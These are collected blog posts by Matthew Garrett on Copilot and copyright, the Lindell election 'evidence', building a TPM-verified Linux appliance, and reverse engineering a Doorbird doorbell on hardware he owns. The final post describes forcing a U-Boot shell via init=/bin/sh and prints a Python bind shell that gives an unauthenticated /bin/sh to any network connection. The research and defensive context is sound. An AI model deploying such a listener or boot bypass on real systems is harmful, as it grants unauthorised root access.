
Does free software benefit from ML models being derived works of training data?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/57615.html

Github recently announced Copilot, a machine learning system that makes suggestions for you when you’re writing code. It’s apparently trained on all public code hosted on Github, which means there’s a lot of free software in its training set. Github assert that the output of Copilot belongs to the user, although they admit that it may occasionally produce output that is identical to content from the training set.

Unsurprisingly, this has led to a number of questions along the lines of “If Copilot embeds code that is identical to GPLed training data, is my code now GPLed?”. This is extremely understandable, but the underlying issue is actually more general than that. Even code under permissive licenses like BSD requires retention of copyright notices and disclaimers, and failing to include them is just as much a copyright violation as incorporating GPLed code into a work without abiding by the terms of the GPL.

But free software licenses only have power to the extent that copyright permits them to. If your code isn’t a derived work of GPLed material, you have no obligation to follow the terms of the GPL. Github clearly believe that Copilot’s output doesn’t count as a derived work as far as US copyright law goes, and as a result the licenses on the training data don’t apply to the output. Some people have interpreted this as an attack on free software – Copilot may insert code that’s either identical or extremely similar to GPLed code, and claim that there are no license obligations created as a result, effectively allowing the laundering of GPLed code into proprietary software.

I’m completely unqualified to hold a strong opinion on whether Github’s legal position is justifiable or not, and right now I’m also not interested in thinking about it too much. What I think is more interesting is what the impact of either position has on free software. Do we benefit more from a future where the output of Copilot (or similar projects) is considered a derived work of the training data, or one where it isn’t? Having been involved in a bunch of GPL enforcement activities, it’s very easy to think of this as something that weakens the GPL and, as a result, weakens free software. That was my initial reaction, but that’s shifted over the past few days.

Let’s look at the GNU manifesto, specifically this section:

The fact that the easiest way to copy a program is from one neighbor to another, the fact that a program has both source code and object code which are distinct, and the fact that a program is used rather than read and enjoyed, combine to create a situation in which a person who enforces a copyright is harming society as a whole both materially and spiritually; in which a person should not do so regardless of whether the law enables him to.

The GPL makes use of copyright law to ensure that GPLed work can’t be taken from the commons. Anyone who produces a derived work of GPLed code is obliged to provide that work under the same terms. If software weren’t copyrightable, the GPL would have no power. But this is the outcome Stallman wanted! The GPL doesn’t exist because copyright is good, it exists because software being copyrightable is what enables the concept of proprietary software in the first place.

The powers that the GPL uses to enforce sharing of code are used by the authors of proprietary software to reduce that sharing. They attempt to forbid us from examining their code to determine how it works – they argue that anyone who does so is tainted, unable to contribute similar code to free software projects in case they produce a derived work of the original. Broadly speaking, the further the definition of a derived work reaches, the greater the power of proprietary software authors. If Oracle’s argument that APIs are copyrightable had prevailed, it would have been disastrous for free software. If the Apple look and feel suit had established that Microsoft infringed Apple’s copyright, we might be living in a future where we had no free software desktop environments.

When we argue for an interpretation of copyright law that enhances the power of the GPL, we’re also enhancing the power of giant corporations with a lot of lawyers on hand. So let’s look at this another way. If Github’s interpretation of copyright law holds, we can train a model on proprietary code and extract concepts without having to worry about being tainted. The proprietary code itself won’t enter the commons, but the ideas it embodies will. No more worries about whether you’re literally copying the code that implements an algorithm you want to duplicate – simply start typing and let the model remove the risk for you.

There’s a reasonable counter argument about equality here. How much GPL-influenced code is going to end up in proprietary projects when compared to the reverse? It’s not an easy question to answer, but we should bear in mind that the majority of public repositories on Github aren’t under an open source license. Copilot is already claiming to give us access to the concepts embodied in those repositories. Do these provide more value than is given up? I honestly don’t know how to measure that. But what I do know is that free software was founded in a belief that software shouldn’t be constrained by copyright, and our default stance shouldn’t be to argue against the idea that copyright is weaker than we imagined.


Mike Lindell’s Cyber “Evidence”

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/57459.html

Mike Lindell, notable for absolutely nothing relevant in this field, today filed a lawsuit against a couple of voting machine manufacturers in response to them suing him for defamation after he claimed that they were covering up hacks that had altered the course of the US election. Paragraph 104 of his suit asserts that he has evidence of at least 20 documented hacks, including the number of votes that were changed. The citation is just a link to a video called Absolute 9-0, which claims to present sufficient evidence that the US supreme court will come to a 9-0 decision that the election was tampered with.

The claim is that Lindell was provided with a set of files on the 9th of January, and gave these to some cyber experts to verify. These experts identified them as packet captures. The video contains scrolling hex, and we are told that this is the raw encrypted data from the files. In reality, the hex values correspond very clearly to printable ASCII, and appear to just be the Pennsylvania voter roll. They’re not encrypted, and they’re not packet captures (they contain no packet headers).

20 of these packet captures were then selected and analysed, giving us the tables contained within Exhibit 12. The alleged source IPs appear to correspond to the networks the tables claim, and the latitude and longitude presumably just come from a geoip lookup of some sort (although clearly those values are far too precise to be accurate). But if we look at the target IPs, we find something interesting. Most of them resolve to the website for the county that was the nominal target (eg, 198.108.253.104 is www.deltacountymi.org). So, we’re supposed to believe that in many cases, the county voting infrastructure was hosted on the county website.

Unfortunately we’re not given the destination port, but 198.108.253.104 isn’t listening on anything other than 80 and 443. We’re told that the packet data is encrypted, so presumably it’s over HTTPS. So, uh, how did they decrypt this to figure out how many votes were switched? If Mike’s hackers have broken TLS, they really don’t need to be dealing with this.

We’re also given some background claims – that it’s impossible to reconstruct packet captures after the fact (untrue), and that modifying them would change their hashes (true, but in the absence of known good hash values that tells us nothing) – but it’s pretty clear that nothing we’re shown actually demonstrates what we’re told it does.

In summary: yes, any supreme court decision on this would be 9-0, just not the way he’s hoping for.

Update: It was pointed out that this data appears to be part of a larger dataset. This one is even more dubious – it somehow has MAC addresses for both the source and destination (which is impossible), and almost none of these addresses are in actual issued ranges.


Producing a trustworthy x86-based Linux appliance

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/57199.html

Let’s say you’re building some form of appliance on top of general purpose x86 hardware. You want to be able to verify the software it’s running hasn’t been tampered with. What’s the best approach with existing technology?

Let’s split this into two separate problems. The first is to do as much as we can to ensure that the software can’t be modified without our consent[1]. This requires that each component in the boot chain verify that the next component is legitimate. We call the first component in this chain the root of trust, and in the x86 world this is the system firmware[2]. This firmware is responsible for verifying the bootloader, and the easiest way to do this on x86 is to use UEFI Secure Boot. In this setup the firmware contains a set of trusted signing certificates and will only boot executables with a chain of trust to one of these certificates. Switching the system into setup mode from the firmware menu will allow you to remove the existing keys and install new ones.

(Note: You shouldn’t use the trusted certificate directly for signing bootloaders – instead, the trusted certificate should be used to sign another certificate and the key for that certificate used to sign your bootloader. This way, if you ever need to revoke the signing certificate, you can simply sign a new one with the trusted parent and push out a revocation update instead of having to provision new keys)

But what do you want to sign? In the general purpose Linux world, we use an intermediate bootloader called Shim to bridge from the Microsoft signing authority to a distribution one. Shim then verifies the signature on grub, and grub in turn verifies the signature on the kernel. This is a large body of code that exists because of the use cases that general purpose distributions need to support – primarily, booting on arbitrary off the shelf hardware, and allowing arbitrary and complicated boot setups. This is unnecessary in the appliance case, where the hardware target can be well defined, where there’s no need for interoperability with the Microsoft signing authority, and where the boot configuration can be extremely static.

We can skip all of this complexity using systemd-boot’s unified Linux image support. This has the format described here, but the short version is that it’s simply a kernel and initramfs linked into a small EFI executable that will run them. Instructions for generating such an image are here, and if you follow them you’ll end up with a single static image that can be directly executed by the firmware. Signing this avoids dealing with a whole host of problems associated with relying on shim and grub, but note that you’ll be embedding the initramfs as well. Again, this should be fine for appliance use-cases, but you’ll need your build system to support building the initramfs at image creation time rather than relying on it being generated on the host.
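
Wired into a build system, that step looks something like the sketch below – the stub path, file names, key names and section offsets are the ones commonly used in the systemd documentation, so treat them as assumptions to check rather than gospel:

# Sketch: glue a kernel, initramfs, command line and os-release onto the systemd
# EFI stub, then sign the result. Paths, offsets and key names are placeholders.
import subprocess

STUB = "/usr/lib/systemd/boot/efi/linuxx64.efi.stub"  # assumed location

subprocess.run([
    "objcopy",
    "--add-section", ".osrel=/etc/os-release", "--change-section-vma", ".osrel=0x20000",
    "--add-section", ".cmdline=cmdline.txt",   "--change-section-vma", ".cmdline=0x30000",
    "--add-section", ".linux=vmlinuz",         "--change-section-vma", ".linux=0x2000000",
    "--add-section", ".initrd=initramfs.img",  "--change-section-vma", ".initrd=0x3000000",
    STUB, "unified-linux.efi",
], check=True)

# Sign the image so the firmware will accept it under Secure Boot
subprocess.run(["sbsign", "--key", "signing.key", "--cert", "signing.crt",
                "--output", "unified-linux.efi.signed", "unified-linux.efi"], check=True)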

At this point we have a single image that can be verified by the firmware and will get us to the point of a running kernel and initramfs. Unless you’ve got enough RAM that you can put your entire workload in the initramfs, you’re going to want a filesystem as well, and you’re going to want to verify that that filesystem hasn’t been tampered with. The easiest approach to this is to use dm-verity, a device-mapper layer that uses a hash tree to verify that the filesystem contents haven’t been modified. The kernel needs to know what the root hash is, so this can either be embedded into your initramfs image or into the kernel command line. Either way, it’ll end up in the signed boot image, so nobody will be able to tamper with it.
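
As a rough sketch of that build step (file names are placeholders, and exactly how the root hash gets consumed at boot depends on your initramfs tooling):

# Sketch: create a dm-verity hash tree for a filesystem image and capture the
# root hash so it can be baked into the signed kernel command line.
import os, re, subprocess

out = subprocess.run(["veritysetup", "format", "rootfs.img", "rootfs.hashtree"],
                     capture_output=True, text=True, check=True).stdout
root_hash = re.search(r"Root hash:\s*([0-9a-f]+)", out).group(1)

# Something in the signed image then has to open the device against this hash
# (e.g. systemd's veritysetup generator reads roothash= from the command line);
# the device name below is illustrative.
with open("cmdline.txt", "w") as f:
    f.write(f"root=/dev/mapper/root roothash={root_hash} ro")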

It’s important to note that a dm-verity partition is read-only – the kernel doesn’t have the cryptographic secret that would be required to generate a new hash tree if the partition is modified. So if you require the ability to write data or logs anywhere, you’ll need to add a new partition for that. If this partition is unencrypted, an attacker with access to the device will be able to put whatever they want on there. You should treat any data you read from there as untrusted, and ensure that it’s validated before use (ie, don’t just feed it to a random parser written in C and expect that everything’s going to be ok). On the other hand, if it’s encrypted, remember that you can’t just put the encryption key in the boot image – an attacker with access to the device is going to be able to dump that and extract it. You’ll probably want to use a TPM-sealed encryption secret, which will be discussed later on.

At this point everything in the boot process is cryptographically verified, and so should be difficult to tamper with. Unfortunately this isn’t really sufficient – on x86 systems there’s typically no verification of the integrity of the secure boot database. An attacker with physical access to the system could attach a programmer directly to the firmware flash and rewrite the secure boot database to include keys they control. They could then replace the boot image with one that they’ve signed, and the machine would happily boot code that the attacker controlled. We need to be able to demonstrate that the system booted using the correct secure boot keys, and the only way we can do that is to use the TPM.

I wrote an introduction to TPMs a while back. The important thing to know here is that the TPM contains a set of Platform Configuration Registers that are large enough to contain a cryptographic hash. During boot, each component of the boot process will generate a “measurement” of other security critical components, including the next component to be booted. These measurements are a representation of the data in question – they may simply be a hash of the object being measured, or the hash of a structure containing various pieces of metadata. Each measurement is passed to the TPM, along with the PCR it should be measured into. The TPM takes the new measurement, appends it to the existing value, and then stores the hash of this concatenated data in the PCR. This means that the final PCR value depends not only on the measurement, but also on every previous measurement. Without breaking the hash algorithm, there’s no way to set the PCR to an arbitrary value. The hash values and some associated data are stored in a log that’s kept in system RAM, which we’ll come back to later.
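
If it helps to see it written down, here’s a toy model of a SHA-256 PCR and of replaying an event log against it – illustrative only, it doesn’t talk to a real TPM:

# Toy model of a SHA-256 PCR bank: each extend folds a new digest into the old
# value, so the final value encodes the entire ordered history of measurements.
import hashlib

def extend(pcr_value, measurement):
    return hashlib.sha256(pcr_value + measurement).digest()

def replay(event_log):
    # Replaying the log should reproduce the PCR value reported by the TPM;
    # if it doesn't, either the log or the PCR has been tampered with.
    pcr = bytes(32)  # PCRs start out as all zeroes after reset
    for digest in event_log:
        pcr = extend(pcr, digest)
    return pcr

log = [hashlib.sha256(b"secure boot keys").digest(),
       hashlib.sha256(b"bootloader").digest()]
assert replay(log) == extend(extend(bytes(32), log[0]), log[1])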

Different PCRs store different pieces of information, but the one that’s most interesting to us is PCR 7. Its use is documented in the TCG PC Client Platform Firmware Profile (section 3.3.4.8), but the short version is that the firmware will measure the secure boot keys that are used to boot the system. If the secure boot keys are altered (such as by an attacker flashing new ones), the PCR 7 value will change.

What can we do with this? There’s a couple of choices. For devices that are online, we can perform remote attestation, a process where the device can provide a signed copy of the PCR values to another system. If the system also provides a copy of the TPM event log, the individual events in the log can be replayed in the same way the TPM used them to calculate the PCR values, and the result compared to the actual PCR values. If they match, that implies that the log values are correct, and we can then analyse individual log entries to make assumptions about system state. If a device has been tampered with, the PCR 7 values and associated log entries won’t match the expected values, and we can detect the tampering.

If a device is offline, or if there’s a need to permit local verification of the device state, we still have options. First, we can perform remote attestation to a local device. I demonstrated doing this over Bluetooth at LCA back in 2020. Alternatively, we can take advantage of other TPM features. TPMs can be configured to store secrets or keys in a way that renders them inaccessible unless a chosen set of PCRs have specific values. This is used in tpm2-totp, which uses a secret stored in the TPM to generate a TOTP value. If the same secret is enrolled in any standard TOTP app, the value generated by the machine can be compared to the value in the app. If they match, the PCR values the secret was sealed to are unmodified. If they don’t, or if no numbers are generated at all, that demonstrates that PCR 7 is no longer the same value, and that the system has been tampered with.
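
For reference, the TOTP computation both sides perform is small – this is the standard RFC 6238 calculation, with a placeholder secret:

# Minimal RFC 6238 TOTP: HMAC-SHA1 over the current 30 second interval, then
# dynamic truncation to 6 digits. Both sides compute this from the shared secret.
import hmac, hashlib, struct, time

def totp(secret, when=None, step=30, digits=6):
    counter = int((time.time() if when is None else when) // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp(b"example-shared-secret"))  # placeholder secret, for illustration only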

Unfortunately, TOTP requires that both sides have possession of the same secret. This is fine when a user is making that association themselves, but works less well if you need some way to ship the secret on a machine and then separately ship the secret to a user. If the user can simply download the secret via some API, so can an attacker. If an attacker has the secret, they can modify the secure boot database and re-seal the secret to the new PCR 7 value. That means having to add some form of authentication, along with a strong binding of machine serial number to a user (in order to avoid someone with valid credentials simply downloading all the secrets).

Instead, we probably want some mechanism that uses asymmetric cryptography. A keypair can be generated on the TPM, which will refuse to release an unencrypted copy of the private key. The public key, however, can be exported and stored. If it’s acceptable for a verification app to connect to the internet then the public key can simply be obtained that way – if not, a certificate can be issued to the key, and this exposed to the verifier via a QR code. The app then verifies that the certificate is signed by the vendor, and if so extracts the public key from that. The private key can have an associated policy that only permits its use when PCR 7 has an appropriate value, so the app then generates a nonce and asks the user to type that into the device. The device generates a signature over that nonce and displays that as a QR code. The app verifies the signature matches, and can then assert that PCR 7 has the expected value.
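
A sketch of the verifier end of that exchange, assuming EC keys and Python’s cryptography library (certificate transport, QR handling and error reporting are all elided, and sign_with_device stands in for the user relaying the nonce and signature by hand):

# Sketch of the offline verifier: check the device certificate against the
# vendor's public key, then check a signature over a fresh nonce. Key types and
# the sign_with_device callback are assumptions for illustration.
import os
from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

def verify_device(vendor_pubkey, device_cert_pem, sign_with_device):
    cert = x509.load_pem_x509_certificate(device_cert_pem)
    # 1. Is this certificate really one the vendor issued? verify() raises on mismatch.
    vendor_pubkey.verify(cert.signature, cert.tbs_certificate_bytes,
                         ec.ECDSA(cert.signature_hash_algorithm))
    # 2. Can the device sign a fresh nonce with the TPM-resident key? The TPM
    #    will only allow that signature if PCR 7 matches the key's policy.
    nonce = os.urandom(16)
    signature = sign_with_device(nonce)
    cert.public_key().verify(signature, nonce, ec.ECDSA(hashes.SHA256()))
    return True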

Once we can assert that PCR 7 has the expected value, we can assert that the system booted something signed by us and thus infer that the rest of the boot chain is also secure. But this is still dependent on the TPM obtaining trustworthy information, and unfortunately the bus that the TPM sits on isn’t really terribly secure (TPM Genie is an example of an interposer for i2c-connected TPMs, but there’s no reason an LPC one can’t be constructed to attack the sort usually used on PCs). TPMs do support encrypted communication channels, but bootstrapping those isn’t straightforward without firmware support. The easiest way around this is to make use of a firmware-based TPM, where the TPM is implemented in software running on an ancillary controller. Intel’s solution is part of their Platform Trust Technology and runs on the Management Engine, AMD run it on the Platform Security Processor. In both cases it’s not terribly feasible to intercept the communications, so we avoid this attack. The downside is that we’re then placing more trust in components that are running much more code than a TPM would and which have a correspondingly larger attack surface. Which is preferable is going to depend on your threat model.

Most of this should be achievable using Yocto, which now has support for dm-verity built in. It’s almost certainly going to be easier using this than trying to build on top of a general purpose distribution. I’d love to see this become a largely “push button, receive secure image” process, so I might take a go at that if I have some free time in the near future.

[1] Obviously technologies that can be used to ensure nobody other than me is able to modify the software on devices I own can also be used to ensure that nobody other than the manufacturer is able to modify the software on devices that they sell to third parties. There’s no real technological solution to this problem, but we shouldn’t allow the fact that a technology can be used in ways that are hostile to user freedom to cause us to reject that technology outright.
[2] This is slightly complicated due to the interactions with the Management Engine (on Intel) or the Platform Security Processor (on AMD). Here’s a good writeup on the Intel side of things.


More doorbell adventures

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56917.html

Back in my last post on this topic, I’d got shell on my doorbell but hadn’t figured out why the HTTP callbacks weren’t always firing. I still haven’t, but I have learned some more things.

Doorbird sell a chime, a network connected device that is signalled by the doorbell when someone pushes a button. It costs about $150, which seems excessive, but would solve my problem (ie, that if someone pushes the doorbell and I’m not paying attention to my phone, I miss it entirely). But given a shell on the doorbell, how hard could it be to figure out how to mimic the behaviour of one?

Configuration for the doorbell is all stored under /mnt/flash, and there’s a bunch of files prefixed 1000eyes that contain config (1000eyes is the German company that seems to be behind Doorbird). One of these was called 1000eyes.peripherals, which seemed like a good starting point. The initial contents were {"Peripherals":[]}, so it seemed likely that it was intended to be JSON. Unfortunately, since I had no access to any of the peripherals, I had no idea what the format was. I threw the main application into Ghidra and found a function that had debug statements referencing “initPeripherals” and read a bunch of JSON keys out of the file, so I could simply look at the keys it referenced and write out a file based on that. I did so, and it didn’t work – the app stubbornly refused to believe that there were any defined peripherals. The check that was failing was pcVar4 = strstr(local_50[0],PTR_s_"type":"_0007c980);, which made no sense, since I very definitely had a type key in there. And then I read it more closely. strstr() wasn’t being asked to look for "type":, it was being asked to look for "type":". I’d left a space between the : and the opening " of the value, which meant it wasn’t matching. The rest of the function seems to call an actual JSON parser, so I have no idea why it doesn’t just use that for this part as well, but deleting the space and restarting the service meant it now believed I had a peripheral attached.

The mobile app that’s used for configuring the doorbell now showed a device in the peripherals tab, but it had a weird corrupted name. Tapping it resulted in an error telling me that the device was unavailable, and on the doorbell itself generated a log message showing it was trying to reach a device with the hostname bha-04f0212c5cca and (unsurprisingly) failing. The hostname was being generated from the MAC address field in the peripherals file and was presumably supposed to be resolved using mDNS, but for now I just threw a static entry in /etc/hosts pointing at my Home Assistant device. That was enough to show that when I opened the app the doorbell was trying to call a CGI script called peripherals.cgi on my fake chime. When that failed, it called out to the cloud API to ask it to ask the chime[1] instead. Since the cloud was completely unaware of my fake device, this didn’t work either. I hacked together a simple server using Python’s HTTPServer and was able to return data (another block of JSON). This got me to the point where the app would now let me get to the chime config, but would then immediately exit. adb logcat showed a traceback in the app caused by a failed assertion due to a missing key in the JSON, so I ran the app through jadx, found the assertion and from there figured out what keys I needed. Once that was done, the app opened the config page just fine.

Unfortunately, though, I couldn’t edit the config. Whenever I hit “save” the app would tell me that the peripheral wasn’t responding. This was strange, since the doorbell wasn’t even trying to hit my fake chime. It turned out that the app was making a CGI call to the doorbell, and the thread handling that call was segfaulting just after reading the peripheral config file. This suggested that the format of my JSON was probably wrong and that the doorbell was not handling that gracefully, but trying to figure out what the format should actually be didn’t seem easy and none of my attempts improved things.

So, new approach. Rather than writing the config myself, why not let the doorbell do it? I should be able to use the genuine pairing process if I could mimic the chime sufficiently well. Hitting the “add” button in the app asked me for the username and password for the chime, so I typed in something random in the expected format (six characters followed by four zeroes) and a sufficiently long password and hit ok. A few seconds later it told me it couldn’t find the device, which wasn’t unexpected. What was a little more unexpected was that the log on the doorbell was showing it trying to hit another bha-prefixed hostname (and, obviously, failing). The hostname contains the MAC address, but I hadn’t told the doorbell the MAC address of the chime, just its username. Some more digging showed that the doorbell was calling out to the cloud API, giving it the 6 character prefix from the username and getting a MAC address back. Doing the same myself revealed that there was a straightforward mapping from the prefix to the mac address – changing the final character from “a” to “b” incremented the MAC by one. It’s actually just a base 26 encoding of the MAC, with aaaaaa translating to 00408C000000.
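
My reconstruction of that mapping – a guess that matches the observations above, not anything from Doorbird’s documentation:

# Reconstruction of the observed prefix-to-MAC mapping: treat the six lowercase
# characters as a base 26 number and add it to the base address 00:40:8C:00:00:00.
# This fits the observations described above, but it's a guess, not a documented format.
BASE_MAC = 0x00408C000000

def prefix_to_mac(prefix):
    value = 0
    for ch in prefix.lower():
        value = value * 26 + (ord(ch) - ord("a"))
    return f"{BASE_MAC + value:012x}"

assert prefix_to_mac("aaaaaa") == "00408c000000"
assert int(prefix_to_mac("aaaaab"), 16) == BASE_MAC + 1
print("bha-" + prefix_to_mac("aaaaab"))  # hostname format used by the doorbell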

That explained how the hostname was being generated, and in return I was able to work backwards to figure out which username I should use to generate the hostname I was already using. Attempting to add it now resulted in the doorbell making another CGI call to my fake chime in order to query its feature set, and by mocking that up as well I was able to send back a file containing X-Intercom-Type, X-Intercom-TypeId and X-Intercom-Class fields that made the doorbell happy. I now had a valid JSON file, which cleared up a couple of mysteries. The corrupt name was because the name field isn’t supposed to be ASCII – it’s base64 encoded UTF16-BE. And the reason I hadn’t been able to figure out the JSON format correctly was because it looked something like this:

{"Peripherals":[]{"prefix":{"type":"DoorChime","name":"AEQAbwBvAHIAYwBoAGkAbQBlACAAVABlAHMAdA==","mac":"04f0212c5cca","user":"username","password":"password"}}]}

Note that there’s a total of one [ in this file, but two ]s? Awesome. Anyway, I could now modify the config in the app and hit save, and the doorbell would then call out to my fake chime to push config to it. Weirdly, the association between the chime and a specific button on the doorbell is only stored on the chime, not on the doorbell. Further, hitting the doorbell didn’t result in any more HTTP traffic to my fake chime. However, it did result in some broadcast UDP traffic being generated. Searching for the port number led me to the Doorbird LAN API and a complete description of the format and encryption mechanism in use. Argon2I is used to turn the first five characters of the chime’s password (which is also stored on the doorbell itself) into a 256-bit key, and this is used with ChaCha20 to decrypt the payload. The payload then contains a six character field describing the device sending the event, and then another field describing the event itself. Some more scrappy Python and I could pick up these packets and decrypt them, which showed that they were being sent whenever any event occurred on the doorbell. This explained why there was no storage of the button/chime association on the doorbell itself – the doorbell sends packets for all events, and the chime is responsible for deciding whether to act on them or not.
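
For reference, the decryption side looks roughly like this with PyNaCl – where the salt, nonce and Argon2 cost parameters sit in the packet, and exactly which ChaCha20-Poly1305 construction is in use, are details to take from the published LAN API document rather than from this sketch:

# Sketch of decrypting a Doorbird event broadcast. The packet layout (where the
# salt, nonce, opslimit and memlimit live) is deliberately left as parameters;
# the non-IETF ChaCha20-Poly1305 construction below is an assumption.
import nacl.bindings
import nacl.pwhash

def decrypt_event(password, salt, nonce, ciphertext, opslimit, memlimit):
    # Only the first five characters of the password feed the KDF
    key = nacl.pwhash.argon2i.kdf(32, password[:5].encode(), salt,
                                  opslimit=opslimit, memlimit=memlimit)
    return nacl.bindings.crypto_aead_chacha20poly1305_decrypt(ciphertext, None, nonce, key)

# The plaintext is then a fixed-width record: a short field identifying the
# sender, followed by a field describing the event itself.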

On closer examination, it turns out that these packets aren’t just sent if there’s a configured chime. One is sent for each configured user, avoiding the need for a cloud round trip if your phone is on the same network as the doorbell at the time. There was literally no need for me to mimic the chime at all, suitable events were already being sent.

Still. There’s a fair amount of WTFery here, ranging from the strstr() based JSON parsing, the invalid JSON, the symmetric encryption that uses device passwords as the key (requiring the doorbell to be aware of the chime’s password) and the use of only the first five characters of the password as input to the KDF. It doesn’t give me a great deal of confidence in the rest of the device’s security, so I’m going to keep playing.

[1] This seems to be to handle the case where the chime isn’t on the same network as the doorbell


An accidental bootsplash

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56663.html

Back in 2005 we had Debconf in Helsinki. Earlier in the year I’d ended up invited to Canonical’s Ubuntu Down Under event in Sydney, and one of the things we’d tried to design was a reasonable graphical boot environment that could also display status messages. The design constraints were awkward – we wanted it to be entirely in userland (so we didn’t need to carry kernel patches), and we didn’t want to rely on vesafb[1] (because at the time we needed to reinitialise graphics hardware from userland on suspend/resume[2], and vesa was not super compatible with that). Nothing currently met our requirements, but by the time we’d got to Helsinki there was a general understanding that Paul Sladen was going to implement this.

The Helsinki Debconf ended up being an extremely strange event, involving me having to explain to Mark Shuttleworth what the physics of a bomb exploding on a bus were, many people being traumatised by the whole sauna situation, and the whole unfortunate water balloon incident, but it also involved Sladen spending a bunch of time trying to produce an SVG of a London bus as a D-Bus logo and not really writing our hypothetical userland bootsplash program, so on the last night, fueled by Koff that we’d bought by just collecting all the discarded empty bottles and returning them for the deposits, I started writing one.

I knew that Debian was already using graphics mode for installation despite having a textual installer, because they needed to deal with more complex fonts than VGA could manage. Digging into the code, I found that it used BOGL – a graphics library that made use of the VGA framebuffer to draw things. VGA had a pre-allocated memory range for the framebuffer[3], which meant the firmware probably wouldn’t map anything else there, and hitting those addresses probably wouldn’t break anything. This seemed safe.

A few hours later, I had some code that could use BOGL to print status messages to the screen of a machine booted with vga16fb. I woke up some time later, somehow found myself in an airport, and while sitting at the departure gate[4] I spent a while staring at VGA documentation and worked out which magical calls I needed to make to have it behave roughly like a linear framebuffer. Shortly before I got on my flight back to the UK, I had something that could also draw a graphical picture.

Usplash shipped shortly afterwards. We hit various issues – vga16fb produced a 640×480 mode, and some laptops were not inclined to do that without a BIOS call first. 640×400 worked basically everywhere, but meant we had to redraw the art because circles don’t work the same way if you change the resolution. My brief “UBUNTU BETA” artwork that was me literally writing “UBUNTU BETA” on an HP TC1100 shortly after I’d got the Wacom screen working did not go down well, and thankfully we had better artwork before release.

But 16 colours is somewhat limiting. SVGALib offered a way to get more colours and better resolution in userland while still satisfying our original constraints. Unfortunately it relied on VM86, which doesn’t exist in 64-bit mode on Intel systems. I ended up hacking the X.org x86emu into a thunk library that exposed the same API as LRMI, so we could run it without needing VM86. Shockingly, it worked – we had support for 256 colour bootsplashes in any supported resolution on 64 bit systems as well as 32 bit ones.

But by now it was obvious that the future was having the kernel manage graphics support, both in terms of native programming and in supporting suspend/resume. Plymouth is much more fully featured than Usplash ever was, but relies on functionality that simply didn’t exist when we started this adventure. There’s certainly an argument that we’d have been better off making reasonable kernel modesetting support happen faster, but at this point I had literally no idea how to write decent kernel code and everyone should be happy I kept this to userland.

Anyway. The moral of all of this is that sometimes history works out such that you write some software that a huge number of people run without any idea of who you are, and also that this can happen without you having any fucking idea what you’re doing.

Write code. Do crimes.

[1] vesafb relied on either the bootloader or the early stage kernel performing a VBE call to set a mode, and then just drawing directly into that framebuffer. When we were doing GPU reinitialisation in userland we couldn’t guarantee that we’d run before the kernel tried to draw stuff into that framebuffer, and there was a risk that that was mapped to something dangerous if the GPU hadn’t been reprogrammed into the same state. It turns out that having GPU modesetting in the kernel is a Good Thing.

[2] ACPI didn’t guarantee that the firmware would reinitialise the graphics hardware, and as a result most machines didn’t. At this point Linux didn’t have native support for initialising most graphics hardware, so we fell back to doing it from userland. VBEtool was a terrible hack I wrote to try to reinitialise the system’s graphics hardware through a range of mechanisms, and it worked in a surprising number of cases.

[3] As long as you were willing to deal with 640×480 in 16 colours

[4] Helsinki-Vantaan had astonishingly comfortable seating for the time


Exploring my doorbell

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56345.html

I’ve talked about my doorbell before, but started looking at it again this week because sometimes it simply doesn’t send notifications to my Home Assistant setup – the push notifications appear on my phone, but the doorbell simply doesn’t trigger the HTTP callback it’s meant to[1]. This is obviously suboptimal, but it’s also tricky to debug a device when you have no access to it.

Normally I’d just head straight in with a screwdriver, but the doorbell is shared with the other units in this building and it seemed a little anti-social to interfere with a shared resource. So I bought some broken units from ebay and pulled one of them apart. There’s several boards inside, but one of them had a conveniently empty connector at the top with “TX”, “RX” and “GND” labelled. Sticking a USB-serial converter on this gave me output from U-Boot, and then kernel output. Confirmation that my doorbell runs Linux, but unfortunately it didn’t give me a shell prompt. My next approach would often be to just dump the flash and look for vulnerabilities that way, but this device uses TSOP-48 packaged NAND flash rather than the more convenient SPI NOR flash that I already have adapters to access. Dumping this sort of NAND isn’t terribly hard, but the easiest way to do it involves desoldering it from the board and plugging it into something like a Flashcat USB adapter, and my soldering’s not good enough to put it back on the board afterwards. So I wanted another approach.

U-Boot gave a short countdown to hit a key before continuing with boot, and for once hitting a key actually did something. Unfortunately it then prompted for a password, and giving the wrong one resulted in boot continuing[2]. In the past I’ve had good luck forcing U-Boot to drop to a prompt by simply connecting one of the data lines on SPI flash to ground while it’s trying to read the kernel – the failed read causes U-Boot to error out. It turns out the same works fine on raw NAND, so I just edited the kernel boot arguments to append “init=/bin/sh” and soon I had a shell.

From here on, things were made easier by virtue of the device using the YAFFS filesystem. Unlike many flash filesystems, it’s read/write, so I could make changes that would persist through to the running system. There was a convenient copy of telnetd included, but it segfaulted on startup, which reduced its usefulness. Fortunately there was also a copy of Netcat[3]. If you make a fifo somewhere on the filesystem, you can cat the fifo to a shell, pipe the shell to a netcat listener, and then pipe netcat’s output back to the fifo. The shell’s output all gets passed to whatever connects to netcat, and whatever’s sent to netcat gets passed through the fifo back to the shell. This is, obviously, horribly insecure, but it was enough to get a root shell over the network on the running device.
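
The plumbing is maybe easier to see written out in Python (the doorbell only had netcat, so this is purely illustrative) – bind a socket and hand the accepted connection to a shell as its stdin, stdout and stderr:

# Equivalent of the fifo/netcat trick: completely unauthenticated, so only
# something you'd do on a device you're deliberately poking at.
import socket
import subprocess

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 2323))
listener.listen(1)
conn, peer = listener.accept()
subprocess.run(["/bin/sh", "-i"],
               stdin=conn.fileno(), stdout=conn.fileno(), stderr=conn.fileno())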

